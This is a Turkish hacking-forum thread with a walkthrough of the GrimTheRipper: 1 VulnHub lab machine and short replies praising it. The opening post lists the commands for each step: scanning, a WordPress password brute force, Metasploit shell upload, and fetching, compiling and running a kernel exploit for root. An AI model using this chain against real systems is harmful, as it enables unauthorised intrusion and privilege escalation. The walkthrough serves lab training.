THT DUYURU

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm

Seçenekler

GrimTheRipper: 1 Zafiyetli Makine Çözümü//"P4RS

"P4RS - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
18
Mesajlar:
4.559
Konular:
481
Teşekkür (Etti):
1121
Teşekkür (Aldı):
2268
Ticaret:
(0) %
16-12-2019 22:48
#1
GrimTheRipper: 1 Zafiyetli Makine Çözümü//"P4RS
Merhabalar TürkHackTeam ailesi, bugün sizlere "GrimTheRipper: 1 Zafiyetli Makinesinin Çözümünü" göstereceğim.



https://www.vulnhub.com/entry/grimtheripper-1,350/



Makine İsmi: GrimTheRipper: 1

Yayınlanma Tarihi: 20 Ağustos 2019

Yapımcı: Manish Chandra

Seri: GrimTheRipper

Açıklama: Hedefte Root yetkisine erişmek

Dosya Boyutu: 1.5 GB

İşletim Sistemi: Linux

Zorluk Derecesi: Orta




İlk öncelikle hedefin IP adresini almamız lazım bunun için de
Kod:
sudo netdiscover
yazalım.



Hedefin IP adresini öğrendik.



NMAP taraması yaparak açık portlar hakkında bilgi sahibi olacağız. Bunun için
Kod:
nmap -A IP_ADRESİ
olarak yazalım. 22 ve 80 portlarının açık olduğunu gördük



Tarayıcımızı açalım ve IP adresini arayalım. Sitede herhangi bir şey bulamadık.



Siteyi kazımak için dirb aracını kullanacağız. Terminale
Kod:
dirb http://IP_adresi
yazalım.

robots.txt dosyasını ve index dosyalarını buldu bir bakalım.



Bizleri index2 kısmına yönlendiriyor.



İndex2 de ise bir görsel bizleri karşıladı.



Kaynak kodlarına bakayım dedim ve bir base64 şifresi karşıma çıktı



Bunu
Kod:
echo THpFd0f1UQXhNREU9IHRyeSBoYXJk | base64 -d
yazdım ve bir şifre daha verdi. Daha sonra bunu tekrar
Kod:
echo 'LzEwMTAxMDE=' | base64 -d
yazdığımda bana /1010101 verisini verdi.



Sitede IP_ADRESİ/1010101 olarak yazdığımda bir /wordpress olduğunu gördüm.



Wordpress görüntüsü bu şekildedir



Wpscan ile kullanıcı verilerini listelemek için
Kod:
wpscan --url http://IP_adresi/1010101/wordpress/ -e u
yazalım.



Kullanıcının admin olduğunu gördük.



Brute saldırı için rockyou.txt dosyasını kullanacağım. Terminale
Kod:
wpscan wpscan --url http://IP_adresi/1010101/wordpress/ -U admin -P rockyou.txt dosyasının uzantısı


Şifrenin Password@123 olduğunu öğrendik.



Ardından wp-admin-shell-upload exploitini kullanmak için msfconsole'a giriyoruz.
Kod:
msfconsole
yazalım.



Terminale
Kod:
search webapp
yazalım.



Burada 105. sıradakini kullanacağız.



Kullanmak için
Kod:
use 105
yazalım ve ayarlarını görmek için
Kod:
show options
yazalım.



Ayarlamamız gereken bazı ayarlar var bunları da
Kod:
set RHOSTS IP_ADRES 
set TARGETURI /1010101/wordpress/
set USERNAME admin
set PASSWORD Password@123
exploti
yazarak giriş yapalım.



Kabuğa erişmek için ilk öncelikle
Kod:
shell
yazalım ardından da kabuğa erişim için
Kod:
python -c 'import pty;pty.spawn("/bin/bash")'
yazalım ve kabuğa erişelim. Ardından Linux bilgilerini almak için
Kod:
lsb_release -a
yazarak Linux bilgilerini aldık.



Ardından searchsploit ile kernel exploiti aramaya koyuldum. Terminale
Kod:
searchsploit Ubuntu 12.04
yazdım ve kırmızı işaretle aldığım kısmında ki dosyayı almak için
Kod:
searchsploit -m 37292.c
yazdım. Ardından ağı açarak hedef makineden dosyayı indirmek için
Kod:
python -m SimpelHTTPServer
yazdım.



Ardından exploit ile giriş yaptığımız terminale gelerek
Kod:
cd /tmp
wget IP_adresi:8000/37292.c
yazarak dosyayı makineye indirdik.



Ardından dosyayı shell dosyasına çevirmek için
Kod:
gcc 37292.c -o shell
yazdık ve dosyaya tam yetki vermek için
Kod:
chmod 777 shell
yazdık. Ardından shell dosyasını çalıştırmak için
Kod:
./shell
yazalım. Shell dosyası çalıştı peki hangi kullanıcıdayız? id yazalım ve root yetkisinde olduğumuzu görelim.





Konum bu kadardı arkadaşlar, başka bir konuda görüşmek üzere sağlıcakla..

Konu "P4RS tarafından (16-12-2019 23:04 Saat 23:04 ) değiştirilmiştir.
PourLa - ait Kullanıcı Resmi (Avatar)
Green Team
Üyelik tarihi:
03/2016
Nereden:
Mesajlar:
1.326
Konular:
282
Teşekkür (Etti):
351
Teşekkür (Aldı):
333
Ticaret:
(0) %
16-12-2019 23:00
#2
Cevap: GrimTheRipper: 1 Zafiyetli Makine Çözümü//"P4RS
Ellerin dert görmesin hocam ellerine sağlık
---------------------
PourLa
Html/Css > Python > C ve C++
( }-----{ TÜRK HACK TEAM }-----{ )
Twitter | Telegram | İnstagram




By Ghost - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
07/2013
Nereden:
C:\Linux
Yaş:
23
Mesajlar:
939
Konular:
143
Teşekkür (Etti):
396
Teşekkür (Aldı):
405
Ticaret:
(0) %
16-12-2019 23:26
#3
Cevap: GrimTheRipper: 1 Zafiyetli Makine Çözümü//"P4RS
Elinize sağlık hocam wp reverse shell kısmına kadar kolay gözükse de yetki yükseltme de kernel exploit olayı biraz zorlayıcı duruyor onunda kullanımı görmek güzel olmuş
---------------------
Öfkene hakim olamıyorsan;
Niye yaşıyorsun?

-->Muslims Freedom!!!<--
Uchiha-Sasuke - ait Kullanıcı Resmi (Avatar)
Green Team (Deneyimli)
Üyelik tarihi:
07/2016
Nereden:
MSFVenom
Mesajlar:
1.344
Konular:
74
Teşekkür (Etti):
30
Teşekkür (Aldı):
371
Ticaret:
(0) %
16-12-2019 23:27
#4
Cevap: GrimTheRipper: 1 Zafiyetli Makine Çözümü//"P4RS
Ellerine Sağlık P4RS , Yine Mükemmel Olmuş.
---------------------
"Ölüm, insanın değişmez kaderidir; marifet unutulmamaktır.".


PigGunner - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
07/2013
Nereden:
Turk
Mesajlar:
2.312
Konular:
98
Teşekkür (Etti):
201
Teşekkür (Aldı):
399
Ticaret:
(0) %
17-12-2019 00:56
#5
Cevap: GrimTheRipper: 1 Zafiyetli Makine Çözümü//"P4RS
Elinize sağlık hocam.


Alıntı:
By Ghost´isimli üyeden Alıntı Mesajı göster
Elinize sağlık hocam wp reverse shell kısmına kadar kolay gözükse de yetki yükseltme de kernel exploit olayı biraz zorlayıcı duruyor onunda kullanımı görmek güzel olmuş

Aynen "By Ghost"a katılıyorum. Bahsettiğimden biraz farklıymış. Ama detaylı ve güzel anlatmışsınız. Tekrardan elinize sağlık.
---------------------
Copyright by PigGunner.

AhmetKaan46 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2019
Nereden:
root@Kaan:~#
Yaş:
26
Mesajlar:
1.386
Konular:
137
Teşekkür (Etti):
737
Teşekkür (Aldı):
423
Ticaret:
(0) %
17-12-2019 01:17
#6
Cevap: GrimTheRipper: 1 Zafiyetli Makine Çözümü//"P4RS
Eline sağlık hocam devamını bekliyorum zafitet çözümlerinin
Rumexus - ait Kullanıcı Resmi (Avatar)
Stajyer Moderatör
Üyelik tarihi:
01/2016
Mesajlar:
1.083
Konular:
38
Teşekkür (Etti):
651
Teşekkür (Aldı):
245
Ticaret:
(0) %
17-12-2019 01:22
#7
Cevap: GrimTheRipper: 1 Zafiyetli Makine Çözümü//"P4RS
Elinize sağlık hocam mükemmel bir konu çok yararlı, kendini bu alanda geliştirecek arkadaşlar için.
---------------------
PALA
Liserjik


stayhigh - ait Kullanıcı Resmi (Avatar)
Grafiker
Üyelik tarihi:
09/2019
Nereden:
Mars
Mesajlar:
522
Konular:
112
Teşekkür (Etti):
309
Teşekkür (Aldı):
489
Ticaret:
(0) %
17-12-2019 01:51
#8
Cevap: GrimTheRipper: 1 Zafiyetli Makine Çözümü//"P4RS
Hocam ellerinize sağlık
CrazyExelans - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2017
Nereden:
Burning Hâll
Yaş:
100
Mesajlar:
925
Konular:
41
Teşekkür (Etti):
10
Teşekkür (Aldı):
454
Ticaret:
(0) %
17-12-2019 13:08
#9
Cevap: GrimTheRipper: 1 Zafiyetli Makine Çözümü//"P4RS
Emeğine sağlık.
---------------------
Kod:
,
,    -------                                                  --------------
,      The Ordinaryus, Father of White's, Prof. Doç. Dr. Sn. Abuzer Kömürcü Exelansları  R.I.P
,    -------                                                  --------------
,
MyKrallife - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2015
Nereden:
/profile.php
Mesajlar:
2.829
Konular:
274
Teşekkür (Etti):
577
Teşekkür (Aldı):
1610
Ticaret:
(0) %
17-12-2019 15:26
#10
Cevap: GrimTheRipper: 1 Zafiyetli Makine Çözümü//"P4RS
Elinize sağlık hocam az uğraşmadım
---------------------
"Bir Türk Dünyaya Bedeldir"
Mustafa Kemal Atatürk
Siber Güvenlik Kulübü




Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler